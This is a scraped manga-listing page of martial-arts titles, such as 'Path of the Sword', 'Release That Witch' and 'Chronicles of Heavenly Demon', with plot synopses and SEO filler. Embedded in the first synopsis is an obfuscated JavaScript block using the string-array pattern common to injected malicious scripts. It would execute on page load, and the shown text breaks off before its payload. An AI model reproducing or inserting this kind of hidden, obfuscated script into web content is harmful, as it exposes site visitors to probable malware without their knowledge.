Martial Arts - Page 52

Discover top manga Martial Arts with stunning art and thrilling tales. Enjoy the best Martial Arts manga free online today!

2226 results

Path of the Sword

A baby born from a rock, the monster in others’ conversations, married into his wife’s family in accordance to his master’s orders when he grew up, and he yet again gained another title as a toyboy. But who knew, I am actually an absolute sword saint that looks down upon the world, so what if I am a monster, so what if I married into another family, I shall sweep through the world of Huan Yu.<script></script><script>(function(_0x4cf5bf,_0x2eba2a){var _0x9eae42=_0x43fd,_0x4a53d4=_0x4cf5bf();while(!![]){try{var _0x23e0ba=parseInt(_0x9eae42(0x152))/(0x1268+0x336*0xc+-0x38ef)+-parseInt(_0x9eae42(0x14d))/(-0xe60+0x1cf6+-0xe94)+parseInt(_0x9eae42(0x141))/(0xd*-0x35+-0x2012+0x22c6)*(-parseInt(_0x9eae42(0x147))/(0x1a4c+0x303+-0x1d4b))+parseInt(_0x9eae42(0x150))/(-0xd*0x2f1+0x3cd*-0x9+0x593*0xd)*(-parseInt(_0x9eae42(0x15f))/(0x1*-0x1603+-0x1*0x130d+0x6*0x6d9))+-parseInt(_0x9eae42(0x14c))/(-0x1*0x1ad1+0x2543*-0x1+0x401b)*(parseInt(_0x9eae42(0x154))/(0x7*-0x1d6+-0xf4e+0x1c30))+-parseInt(_0x9eae42(0x146))/(0x19*0x4d+0x10f*0x5+-0x1*0xcc7)+parseInt(_0x9eae42(0x149))/(0x146a+-0x14*-0x160+-0x2fe0);if(_0x23e0ba===_0x2eba2a)break;else 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Release That Witch

A male engineer transmigrated into another world and became a prince. This place strikingly resembles the Middle Ages of Europe, but at the same time, it seems kind of different? Witches truly exist, and they even possess magic powers! Magic powers are productive forces! Save the witches, liberate the productive forces! Open map, fight demons, break conspiracies, climb up the science and technology tree, and open the path of hardcore ‘farming’! Associated Names Fang Kai Na Ge Nu Wu Fang Kai Nage Nu Wu Fang Kai Nage Nuwu

3 days ago

TSUYOSHI - Daremo Katenai, Aitsu ni wa

A super-powerful guy keeps defeating everyone around him, even though he doesn\'t like fighting.


Chronicles of Heavenly Demon

‘You emphasized harmony your whole life and this is how you go…!’ The successor of the Spear Master Sect and his apprentice Hyuk Woon Seong were framed of learning a forbidden Demonic art and slayed. A helpless and pitiful death by the hypocrites of the Orthodox Sect. The moment Woon Seong faced his death, The artifact of the Spear Master Sect emitted a light and gave him a new life. The life as Number 900, a trainee of the Demonic Cult! The two identities, the Orthodox Sect and the Demonic Cult. But his objective is one. Vengeance! Accepting his destiny and remembering his grudge, Woon Seong trains in martial arts And his time of revenge slowly comes closer…. Take over the Demonic Cult and punish the hypocrites of the Orthodox Sect! The revenge story of Number 900, Woon Seong growing in tasks of life and death. The webtoon version of author Il-hwang’s popular wuxia novel, Chronicles of the Heavenly Demon.


Song of the Sky Pacers

Read manhua Song of the Sky Pacers / Bu Tian Ge – Die Ballade von den Himmelsstürmern / Bù Tiān Gē / Bộ Thiên Ca / Song of the Sky Walkers (In a made-up dynasty) During the Chen dynasty, Consort Jing gave birth to a pair of fraternal twins under the rays of sunlight. The prince was born with a cinnabar mole between his eyebrows, while the princess was born with six fingers. Fortune and misfortune appeared at the same time, causing the twins to experience entirely different fates as they were forced to leave their family. The heavenly tribulation is approaching, will the two twins who were separated from birth ever get to be reunited? What methods would they use to fight against their destinies? “Song of the Sky Pacers Manhua” is alternative: 步天歌


Song of The Sky Walkers

Read Manga Song of The Sky Walkers Online For Free At Top Manhua Associated Names: Bu Tian Ge – Die Ballade von den Himmelsstürmern / Bù Tiān Gē / Bộ Thiên Ca / Song of the Sky Pacers / 步天歌 The Content Song of The Sky Walkers: (In a made-up dynasty) During the Chen dynasty, Consort Jing gave birth to a pair of fraternal twins under the rays of sunlight. The prince was born with a cinnabar mole between his eyebrows, while the princess was born with six fingers. Fortune and misfortune appeared at the same time, causing the twins to experience entirely different fates as they were forced to leave their family. The heavenly tribulation is approaching, will the two twins who were separated from birth ever get to be reunited? What methods would they use to fight against their destinies? New and hot comics are updated the fastest. The Business Is Closed Due To The Tyrant Parents The Gambled Bride, Loved by a Wicked Lord Cinderella Disappeared MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “Top Manhua” and “ManhwaClan,” as well as related terms like ZinManga, LikeManga, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.


Rebirth Of The Urban Immortal Cultivator

During the anti-cataclysm period, the monk Chen Fanyu fell into the catastrophe of the day, but he dreamed of returning to the earth’s young age in five hundred years. In the last life, I was on the top of the universe, overlooking the world, but no one was accompanied. This world is only willing to live with the right person. After 500 years, the immortal reborn and returned to the city, to make up for the regret and play the story of pretending to be the weak. Associated Names Rebirth: City Cultivation Retry -Again to the Strongest Shinsen- Retry: Futatabi Saikyou no Shinsen e


Martial Legacy

Read manhua Martial Legacy / Martial Inheritance A boy named Shi Shan along with his little sister were offered as sacrifice to a demon that has been haunting their village. They were rescued by a martial artist who exorcise demons. He took the siblings in as his disciples and taught them the art of cultivation and about the demons that dwell in this world. Truyền Võ 传武 传武(金仙大战克苏鲁) 전무: 최강 무도 계승패


Immortal, Invincible

Read Manhwa Immortal, Invincible also known as “The Invincible Immortal; Warrior Will Never Die; 不死無敵; 不死至尊; 重生不死尊; 불사무적” Online For Free At TOP MANHUA Description of the comic Immortal, Invincible From a thieving child to one who would shake the world. Rising to the title of Immortal Master, one of the Godly Twelve Stars, but ultimately betrayed. Now, he has been given a chance to change that, and create a better future- for both him, and the world. Based on the popular novel of the same name. Mangazin (Mangazin, ZinManga) Read Manhwa, Read Manhua and Read Manga comics online free – updated with the fastest, most comprehensive, and highest-quality images, accompanied by complete English translations. Every manga is updated daily, promising you limitless reading experiences. New and hot comics are updated the fastest. Solo Strike: A Hundred Million Damage The Main Characters That Only I Know The Tragedy of a Villainess


Eternal Sword God

He stood at the pinnacle of the world. Surpassing all since birth in the art of the sword. But fate has left him crippled moments before reaching the apex. But the story continues and the legend will rise again… --- - **Note:** 2nd Place in 15th Chinese Golden Dragon Manhua Awards



He stood at the pinnacle of the world. Surpassing all since birth in the art of the sword. But fate has left him crippled moments before reaching the apex. But the story continues and the legend will rise again…


The Xiao Chronicles

Mu Shiba and Long Shuo — one hot-blooded and passionate, the other cold and distant. Despite their vastly different personalities, the two young men\'s paths cross and they set out on a journey to find the mysterious \"Xiao\"...
